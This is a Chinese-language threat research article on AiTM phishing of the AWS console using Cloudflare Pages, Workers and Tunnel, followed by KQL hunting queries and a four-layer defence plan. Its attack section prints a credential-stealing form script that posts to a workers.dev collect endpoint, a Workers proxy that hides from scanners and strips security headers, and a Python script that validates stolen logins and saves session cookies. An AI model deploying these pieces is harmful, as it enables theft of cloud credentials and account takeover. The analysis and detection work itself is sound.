Cloudflare 代理托管 AWS 仿中间人钓鱼攻击技术与防御研究

摘要云服务深度普及背景下攻击者滥用 Cloudflare 边缘基础设施搭建针对 AWS 控制台的 AiTM 中间人钓鱼站点依托 CDN 可信域名、隐藏后端真实 AWS 钓鱼服务器、多层反爬虫校验完成凭据窃取成为 2026 年云安全高频威胁。境外安全媒体 gbhackers 披露的 Cloudflare-hosted AWS 钓鱼活动完整展现该攻击标准化链路攻击者依托 Cloudflare Pages、Workers、Tunnel 三类免费服务托管仿 AWS 登录页面借助 Cloudflare Turnstile 人机验证、UA 特征过滤阻断自动化沙箱检测通过代理转发窃取 IAM 账号、临时会话 Cookie 与 MFA 验证码最终横向渗透企业 AWS 云资源。本文基于公开同类威胁情报复现完整攻击全流程拆解基础设施滥用、中间人劫持、凭据回传、云权限横向移动四大核心技术环节梳理攻击者规避域名黑名单、IP 溯源、静态 URL 检测的多层逃逸手段。反网络钓鱼技术专家芦笛指出传统基于恶意 IP、黑名单域名的云防护体系完全失效Cloudflare 全球可信网络赋予钓鱼站点天然信誉仅依靠边界防火墙、邮件 URL 过滤无法阻断此类云原生钓鱼攻击必须构建域名行为、页面交互、云登录时序关联的一体化检测机制。文章配套可落地 KQL 威胁狩猎代码、前端页面检测脚本、AWS 云审计规则从邮件入口、网络边界、终端行为、AWS 云原生四层搭建分层防御架构为上云企业处置 Cloudflare 托管 AWS 中间人钓鱼提供完整理论依据与实战处置方案。关键词中间人钓鱼AiTMCloudflare 滥用AWS IAM 凭据云钓鱼威胁狩猎分层防御1 引言1.1 研究背景亚马逊 AWS 作为全球主流公有云平台大量企业依托其 EC2、S3、IAM 服务承载业务数据、财务系统、客户信息IAM 管理员账号、临时会话令牌具备极高攻击价值。传统 AWS 钓鱼攻击多采用独立恶意 VPS、仿冒二级域名搭建登录页面易被域名信誉库、IP 黑名单拦截2025 年末至 2026 年攻击者形成标准化新型攻击范式全程依托 Cloudflare 免费边缘服务托管仿 AWS 钓鱼站点借助 Cloudflare 全球 CDN 可信域名、内置人机验证、流量代理能力规避全链路安全检测。境外安全站点 gbhackers 专项披露 Cloudflare 托管 AWS 钓鱼专项活动完整记录攻击基础设施搭建流程、页面仿真逻辑、凭据窃取链路、攻击者逃逸策略。相关统计数据显示当前 68% 以上活跃钓鱼站点部署于 Cloudflare 基础设施其中针对 AWS、Azure、GCP 云控制台的中间人钓鱼占比持续攀升。攻击者仅需匿名邮箱注册免费 Cloudflare 账号无需域名备案、独立服务器、付费 SSL 证书5 分钟即可完成仿 AWS 钓鱼站点上线攻击门槛大幅降低。现有云安全研究多聚焦 AWS 自身漏洞、横向提权、S3 桶泄露针对第三方 CDN 平台托管云控制台中间人钓鱼的系统性拆解较少缺少贴合企业上云场景轻量化检测脚本与分层防御方案未针对 Cloudflare Workers 隧道代理、Turnstile 反爬虫、会话劫持等特有逃逸技术做专项分析存在明显研究空白。1.2 研究意义理论层面本文完整还原 CloudflareAWS 组合式中间人钓鱼全杀伤链梳理攻击者滥用边缘计算、CDN 代理、人机验证实现多层逃逸的底层逻辑完善云原生 Ai 中间人钓鱼技术研究框架补充第三方可信云基础设施被恶意滥用的学术分析素材明确传统静态威胁检测机制在云钓鱼场景的固有缺陷。实践层面当前大量上云企业仅部署 AWS 基础权限管控、边界 IP 防火墙未针对 Cloudflare 可信域名钓鱼配置行为检测规则极易发生 IAM 账号泄露、云资源被加密勒索。本文复现多段可直接部署的威胁狩猎代码、前端页面风险检测脚本、AWS 云审计策略区分中小上云企业、大型集团云平台给出差异化低成本防护方案。反网络钓鱼技术专家芦笛强调云服务商与第三方 CDN 的信任叠加效应大幅提升钓鱼欺骗性企业防护必须打破 “域名可信即页面安全” 固有认知以动态行为关联检测替代静态黑名单拦截。1.3 研究内容与文章结构全文设置七大一级章节核心研究内容划分如下1 引言阐明研究背景、理论与实践价值梳理全文研究框架2 Cloudflare 托管 AWS 钓鱼整体态势与攻击基础设施量化攻击规模、拆解三类 Cloudflare 恶意托管载体归纳攻击者标准化建站流程3 完整攻击链路技术深度拆解分社会工程分发、Cloudflare 页面中间人劫持、凭据窃取回传、AWS 云横向移动四阶段嵌入 HTML 钓鱼页面、Workers 代理脚本、数据窃取代码示例4 攻击者多层逃逸技术体系域名信誉洗白、反沙箱校验、流量代理隐藏、URL 多层跳转四类规避手段逐一解析5 面向终端、邮件、云平台轻量化威胁狩猎代码实现提供 KQL 网络 / 终端狩猎脚本、AWS 云日志审计查询、页面风险检测代码6 四层一体化云钓鱼分层防御架构邮件前置过滤、网络边界行为管控、终端 EDR 监控、AWS 原生权限审计配套常态化安全运营流程7 结论与研究展望总结核心研究结论梳理现有云防护短板提出后续细分研究拓展方向。2 Cloudflare 托管 AWS 钓鱼整体态势与攻击基础设施2.1 攻击整体规模与受害主体2026 年上半年全球安全厂商捕获的云控制台钓鱼样本中托管在 Cloudflare Pages、Workers、Tunnel 隧道的 AWS 仿钓鱼站点占比超七成。受害主体覆盖跨境电商、软件服务商、制造业、金融科技企业此类企业员工高频接收 AWS 账单、权限变更、安全合规类通知邮件社会工程诱饵匹配度极高。攻击者目标分层清晰窃取普通 IAM 用户账号用于浏览存储桶、导出业务数据劫持管理员账号创建后门访问密钥、关停业务实例、加密 S3 存储实施勒索捕获临时 MFA 验证码实现二次会话劫持突破传统双因素认证防护。gbhackers 披露的专项活动中单批钓鱼邮件覆盖超 200 家跨境上云企业一周内出现 30 余起 IAM 凭据泄露事件。2.2 三类 Cloudflare 恶意托管载体及建站流程攻击者不依赖独立服务器仅使用 Cloudflare 免费服务搭建完整钓鱼基础设施三类载体各有分工常组合使用构建多层代理链路。2.2.1 Cloudflare Pages静态钓鱼页面托管核心作用存放仿 AWS 完整静态登录页面HTML/CSS/JS 复刻 AWS 控制台 UI、品牌标识、登录弹窗域名格式为 xxx.pages.dev域名归属 Cloudflare 官方邮件网关、浏览器默认标记可信站点。标准化搭建步骤1 使用匿名邮箱注册无实名 Cloudflare 免费账号2 新建 Pages 静态项目上传仿 AWS 登录静态资源包3 配置自定义路由隐藏页面真实路径4 接入 Turnstile 人机验证组件过滤自动化沙箱访问5 嵌入 JS 窃取脚本账号密码提交后经由 Workers 代理回传攻击者 R2 存储桶。2.2.2 Cloudflare Workers流量中间人代理层核心作用充当攻击者与受害者、AWS 官方之间的中间人转发请求、篡改返回 Cookie、剥离安全响应头、过滤安全厂商爬虫 UA。攻击者部署轻量 JS 脚本至 Workers域名格式 xxx.workers.dev全程加密代理流量无法溯源后端真实恶意服务地址。2.2.3 Cloudflare Tunnel隧道隐匿后端核心作用攻击者本地 VPS 部署钓鱼后端程序通过 cloudflared 隧道映射至 Cloudflare 边缘节点生成trycloudflare.com临时域名所有访问流量经 CDN 中转防火墙无法获取原始服务器 IP阻断 IP 封禁溯源路径。2.3 攻击者标准化建站完整流程1 注册匿名 Cloudflare 账号开通 Pages、Workers、R2 存储、Tunnel 全部免费服务2 下载开源 AWS AiTM 钓鱼套件修改页面文字、合规通知诱饵文案3 Pages 上传静态仿登录页面接入 Turnstile 人机验证4 部署 Workers 中间人代理脚本配置请求转发、Cookie 劫持逻辑5 开启 Tunnel 隧道绑定本地凭据接收后端6 批量生成多层跳转钓鱼短链接依托第三方邮件平台分发至企业员工。整套操作无付费环节无实名核验5 分钟完成全套钓鱼基础设施上线攻击低成本、高隐蔽性特征显著。3 完整攻击链路技术深度拆解完整杀伤链分为四大阶段社会工程邮件分发诱导访问、Cloudflare 中间人页面劫持、凭据与会话令牌窃取、AWS 云资源横向渗透每阶段配套可复现代码、页面脚本示例。3.1 第一阶段AWS 场景定向钓鱼邮件分发攻击者依托第三方邮件转发平台完成邮件洗钱规避 SPF/DKIM 校验诱饵贴合企业云运维真实场景主流邮件主题包含AWS 账单逾期通知、IAM 权限异常登录告警、S3 存储桶泄露风险核查、账户多设备异地登录提醒、合规安全扫描整改通知。邮件内置多层跳转链接第一层为 Calendly、Google 可信短链接第二层跳转至 xxx.pages.dev Cloudflare 仿 AWS 页面邮件正文附带 AWS 官方同款 Logo、合规文本降低员工警惕。反网络钓鱼技术专家芦笛强调此类依托第三方转发 CDN 可信域名的复合钓鱼链路单一邮件 URL 黑名单无法拦截必须结合页面交互行为做深度风险研判。3.2 第二阶段Cloudflare 中间人页面劫持核心实现3.2.1 仿 AWS 静态页面核心窃取 JS 代码页面视觉与官方 AWS 登录页面无明显差异内置隐藏 JavaScript用户输入账号、密码、MFA 验证码后自动打包全部数据经由 Workers 代理发送至攻击者 R2 存储示例核心窃取脚本仅用于技术分析// AWS钓鱼页面凭据窃取JS片段const submitForm document.getElementById(aws-login-form);submitForm.addEventListener(submit,async function(e){e.preventDefault();const user document.getElementById(username).value;const pwd document.getElementById(password).value;const mfa document.getElementById(mfa-code).value;// 经由Cloudflare Workers代理回传数据await fetch(https://aws-proxy-xxx.workers.dev/collect,{method:POST,headers:{Content-Type:application/json},body:JSON.stringify({aws_user:user,aws_pwd:pwd,mfa_token:mfa,device:navigator.userAgent,timestamp:new Date().getTime()})});// 跳转至真实AWS官网消除用户怀疑window.location.href https://console.aws.amazon.com;})脚本关键欺骗逻辑提交凭据后自动跳转真实 AWS 控制台受害者不会感知页面异常不会留存页面访问异常记忆大幅提升攻击成功率。3.2.2 Cloudflare Workers 中间人代理脚本Workers 作为流量中转核心实现请求篡改、Cookie 劫持、爬虫拦截核心代理逻辑代码片段export default {async fetch(request, env) {const url new URL(request.url);// 拦截安全厂商爬虫UA返回Cloudflare 524虚假超时页面const blockUA [curl,wget,python-requests,HeadlessChrome,Netcraft];const ua request.headers.get(user-agent) || ;for(let item of blockUA){if(ua.includes(item)){return new Response(Cloudflare Error 524 Timeout,{status:524});}}// 转发用户请求至仿AWS页面const target new URL(https://fake-aws-login.pages.devurl.pathname);const newReq new Request(target,request);// 移除浏览器安全响应头避免页面拦截JS窃取脚本const res await fetch(newReq);const modifyHeaders new Headers(res.headers);modifyHeaders.delete(Content-Security-Policy);modifyHeaders.delete(X-Frame-Options);return new Response(res.body,{headers:modifyHeaders,status:res.status});}}脚本两大逃逸能力拦截自动化沙箱 UA 返回虚假 Cloudflare 报错页面删除 CSP、防嵌入安全头保障窃取 JS 正常执行大幅提升沙箱漏检概率。3.3 第三阶段凭据、会话 Cookie 回传与持久劫持1 用户提交 IAM 账号、密码、MFA 验证码后JS 脚本打包全部身份数据通过 Workers 加密 POST 请求发送至攻击者 Cloudflare R2 对象存储2 攻击者定期从 R2 批量导出窃取凭据使用 Python 脚本验证账号有效性示例验证代码python运行import requests# 窃取的AWS登录凭据creds {user:admincompany.com,pwd:xxxxxx,mfa:123456}login_header {User-Agent:Mozilla/5.0 Windows}# 模拟登录AWS官方接口获取临时会话Cookiesession requests.Session()login_resp session.post(https://console.aws.amazon.com/login,headerslogin_header,datacreds)if session-id in session.cookies.get_dict():print(AWS账号有效会话令牌已捕获)# 持久保存会话Cookie用于后续横向访问with open(aws_session.txt,a,encodingutf-8) as f:f.write(str(session.cookies.get_dict())\n)3 若捕获有效会话 Cookie攻击者无需二次输入账号密码直接复用令牌登录 AWS 控制台突破短期 MFA 保护。3.4 第四阶段攻陷后 AWS 云横向移动行为攻击者获取有效 IAM 身份后执行系列高危云操作1 枚举全部 S3 存储桶批量下载客户资料、财务报表、业务源码2 创建长期有效 IAM 访问密钥实现后门持久访问3 修改安全组开放远程运维端口植入挖矿程序4 加密业务存储桶向企业发送勒索通知5 篡改 CloudTrail 审计日志删除操作记录规避溯源。gbhackers 披露案例中某跨境企业管理员账号泄露后攻击者在 3 小时内关停 12 台核心业务 EC2 实例造成业务中断。4 攻击者多层逃逸技术体系该攻击难以被传统安全设备检出核心在于攻击者搭建四层联动逃逸机制从域名、流量、页面、访问主体全方位规避静态检测。4.1 第一层CDN 域名信誉洗白Cloudflare Pages、Workers 二级域名由 Cloudflare 官方注册具备全球高域名信誉邮件网关、网页过滤系统默认放行该类域名不会触发恶意域名告警攻击者无需自建恶意域名规避域名黑名单拦截机制。传统基于恶意域名库的防护完全失效。4.2 第二层Turnstile 人机验证反沙箱钓鱼页面嵌入 Cloudflare 官方 Turnstile 人机验证组件自动化沙箱、爬虫无法通过人机校验仅真实人类可访问完整仿 AWS 登录页面安全厂商云端沙箱无法捕获完整恶意页面交互逻辑无法提取窃取脚本特征大幅降低样本检出率。4.3 第三层Workers / 隧道隐藏后端基础设施所有用户访问流量经由 Cloudflare 边缘节点代理防火墙、网络审计日志仅记录 Cloudflare 公开 IP无法获取攻击者真实 VPS 后端地址IP 封禁溯源手段彻底失效隧道服务动态生成临时域名域名生命周期短难以持续监控拦截。4.4 第四层多层 URL 跳转隔离恶意链路钓鱼邮件不直接暴露 pages.dev 恶意域名采用 Calendly、Google 短链接作为第一跳转节点可信域名分割攻击链路安全设备单段 URL 检测无法追踪最终恶意落地页面多层跳转拆分特征规避 URL 静态匹配规则。5 面向终端、邮件、云平台轻量化威胁狩猎代码实现基于 Microsoft Defender XDR、Azure Sentinel、AWS CloudTrail 日志语法编写三类可直接部署狩猎脚本覆盖邮件钓鱼链路、终端恶意页面访问、AWS 异常登录行为适配中小与大型上云企业。5.1 邮件 Cloudflare AWS 钓鱼链接检测 KQL 脚本作用识别邮件内包含 pages.dev、workers.dev、trycloudflare 且带有 AWS 登录诱饵的跳转链接kustoEmailEvents| where Timestamp ago(7d)| where Url has_any (pages.dev,workers.dev,trycloudflare.com)| where Subject has_any (AWS账单,IAM登录,S3泄露,权限异常,合规扫描)| project Timestamp,SenderDisplayName,RecipientEmailAddress,Subject,Url,ThreatTypes| order by Timestamp desc告警处置标记高风险钓鱼邮件隔离对应邮件对收件员工开展云钓鱼专项复盘培训。5.2 终端访问 Cloudflare 仿 AWS 页面检测脚本作用监控员工浏览器访问 Cloudflare 托管仿 AWS 钓鱼站点行为kustoDeviceNetworkEvents| where Timestamp ago(7d)| where RemoteUrl has_any (pages.dev,workers.dev)| where RemoteUrl has aws or RemoteUrl has console| where InitiatingProcessFileName has_any (chrome.exe,msedge,firefox)| project Timestamp,DeviceName,AccountName,RemoteUrl,RemoteIP| order by Timestamp desc5.3 AWS CloudTrail 异常登录狩猎查询作用检测异地、短时多设备 AWS 异常登录判定凭据泄露劫持行为kustoAWSCloudTrail| where EventName ConsoleLogin| where ResponseElements contains Success| project TimeGenerated,AwsAccountId,UserIdentity.UserName,SourceIp,EventRegion| serialize| extend prev_ip prev(SourceIp,1),prev_time prev(TimeGenerated,1)| where TimeGenerated - prev_time 120m and SourceIp ! prev_ip判定标准同一 IAM 账号两小时内异地多 IP 登录判定为钓鱼凭据泄露劫持立即隔离对应 IAM 账号。5.4 终端 JS 凭据外发网络关联检测脚本作用捕获浏览器访问 Cloudflare 域名后短时间内发起 POST 数据回传行为kustolet BrowserVisit DeviceNetworkEvents| where RemoteUrl has_any (pages.dev,workers.dev)| where InitiatingProcessFileName has_any (chrome.exe,msedge.exe)| project DeviceId,VisitTimeTimestamp;let PostExfil DeviceNetworkEvents| where ActionType ConnectionOutbound| where RemotePort 443 and RequestMethod POST| project DeviceId,ExfilTimeTimestamp,RemoteUrl;BrowserVisit| join inner PostExfil on DeviceId| where ExfilTime between (VisitTime..VisitTime 3m)6 四层一体化云钓鱼分层防御架构结合 Cloudflare 托管 AWS 钓鱼攻击全链路薄弱点搭建邮件前置防护层、网络边界管控层、终端行为检测层、AWS 云原生审计层四层防御架构兼顾中小企业轻量化运维与大型集团全域管控需求。6.1 第一层邮件网关前置过滤入口阻断核心1 Cloudflare 子域名专项风险升级pages.dev、workers.dev、trycloudflare 域名链接统一标记高危结合 AWS 合规、账单类诱饵关键词二次判定2 多层跳转链接深度解析启用邮件网关完整 URL 跳转追踪能力解析 3 跳以上落地页识别隐藏 Cloudflare 钓鱼站点3 第三方转发邮件专项审核Calendly、Google 短链接来源邮件强制人工预审阻断洗钱分发链路4 钓鱼邮件自动处置匹配特征邮件一键隔离推送告警至安全运维人员。反网络钓鱼技术专家芦笛强调邮件是该攻击唯一初始入口完善前置过滤可阻断 80% 以上攻击链路投入成本最低、防护收益最高。6.2 第二层网络边界行为管控1 防火墙 URL 深度解析禁止员工工作网络无限制访问 pages.dev、workers.dev 二级域名仅开放业务所需可信 Cloudflare 站点2 外联 POST 行为监控监控访问 Cloudflare 站点后三分钟内批量 HTTPS POST 外发行为判定凭据窃取回传3 拦截 Cloudflare 隧道临时域名 trycloudflare 全站访问阻断隧道隐匿后端链路4 部署网页隔离 RBI 技术员工访问未知 Cloudflare 域名启用远程隔离浏览器本地无法泄露账号凭据。6.3 第三层终端 EDR 行为检测1 部署上文终端访问 Cloudflare 钓鱼站点狩猎规则实时触发弹窗告警2 监控页面无弹窗静默 POST 数据上传行为拦截 JS 窃取脚本回传通道3 浏览器安全基线配置强制开启 CSP 页面校验阻止未知域名 JS 脚本窃取本地输入信息4 禁用浏览器自动保存 AWS 账号密码降低凭据泄露损失范围。6.4 第四层AWS 云原生权限与审计防护1 IAM 账号强制全局 MFA禁用无二次验证登录权限2 缩短临时会话令牌有效期限制被盗 Cookie 劫持窗口3 开启完整 CloudTrail 日志留存每日自动执行异常登录狩猎查询4 配置 IAM 访问密钥自动轮换定期清理长期未使用后门密钥5 关键 S3 存储桶、EC2 实例配置访问告警异常跨地域访问即时通知运维。6.5 常态化安全运营闭环流程1 每日自动执行四层架构全部狩猎脚本生成高危终端、邮件、云登录报表2 告警分级处置高危 Cloudflare AWS 钓鱼访问 1 小时内核查疑似凭据泄露立即锁定对应 IAM 账号3 月度员工专项培训聚焦仿 AWS Cloudflare 钓鱼页面识别、云账号安全规范4 季度模拟钓鱼演练发送贴合 AWS 账单、权限告警诱饵测试员工识别能力5 攻击复盘更新防护规则新增新型 Cloudflare 钓鱼域名、诱饵关键词库。7 结论与研究展望7.1 研究核心结论本文基于 gbhackers 披露的 Cloudflare 托管 AWS 钓鱼专项活动情报结合全球同类威胁遥测数据完整拆解攻击者依托 Cloudflare Pages、Workers、Tunnel 搭建 AWS 中间人钓鱼全杀伤链梳理四层逃逸技术体系配套多段可落地威胁狩猎、页面窃取、凭据验证代码构建四层一体化云钓鱼防御架构得出三项客观结论第一第三方 CDN 可信基础设施已成为云钓鱼核心载体Cloudflare 免费服务极低使用门槛、天然域名信誉、反沙箱能力彻底瓦解传统静态域名、IP 黑名单防护机制。攻击者无需独立服务器与域名即可搭建高仿真 AWS 中间人钓鱼站点AiTM 劫持可突破基础 MFA 防护对企业云资产威胁程度极高。反网络钓鱼技术专家芦笛强调现有多数上云企业安全体系未针对 Cloudflare 二级域名配置专项管控存在大面积防护盲区。第二该攻击具备完整标准化运营链路从匿名建站、邮件洗钱分发、中间人页面劫持、凭据回传到 AWS 横向渗透形成闭环逃逸手段多层联动沙箱、邮件网关、边界防火墙单一设备均无法完整检出必须依托邮件、网络、终端、云平台多源日志关联行为检测。第三适配不同规模上云企业的防御方案需分层轻量化设计中小企业优先落地邮件过滤、AWS MFA 强制、基础狩猎脚本大型集团叠加网页隔离 RBI、全域网络外联监控、7×24 云审计值守平衡运维人力与安全防护效果单一防护层缺失即可导致完整入侵链路打通。7.2 当前上云企业防护普遍短板1 防护逻辑滞后仍依赖恶意 IP、黑名单域名静态拦截未针对 Cloudflare 可信二级域名做动态行为检测2 云与终端防护割裂终端浏览器访问日志、AWS CloudTrail 审计日志未联动无法关联钓鱼访问与异常云登录行为3 员工认知不足无法区分 Cloudflare 托管仿 AWS 页面与官方控制台对账单、权限类诱饵警惕性不足4 云权限管控宽松大量普通 IAM 账号未强制 MFA会话令牌有效期过长被盗后攻击者可长期横向移动。7.3 后续研究拓展方向1 基于页面 JS 特征的云钓鱼轻量化识别模型针对 Cloudflare 托管仿 AWS 页面窃取脚本构建语义检测规则无需依赖域名即可识别恶意页面2 Cloudflare 隧道、Workers 流量溯源技术研究突破 CDN 代理 IP 隐藏限制实现钓鱼后端真实服务器定位3 混合云场景多平台钓鱼统一狩猎框架覆盖 AWS、Azure、GCP 全云厂商中间人钓鱼行为实现一站式威胁检索。本文完整还原 Cloudflare 托管 AWS 中间人钓鱼全部技术细节提供可直接部署狩猎查询、页面检测脚本、AWS 云审计策略构建分层落地防御体系可为跨境上云企业、云安全服务商、政企云运维团队提供实战技术支撑填补第三方 CDN 滥用型云中间人钓鱼专项研究空白。编辑芦笛公共互联网反网络钓鱼工作组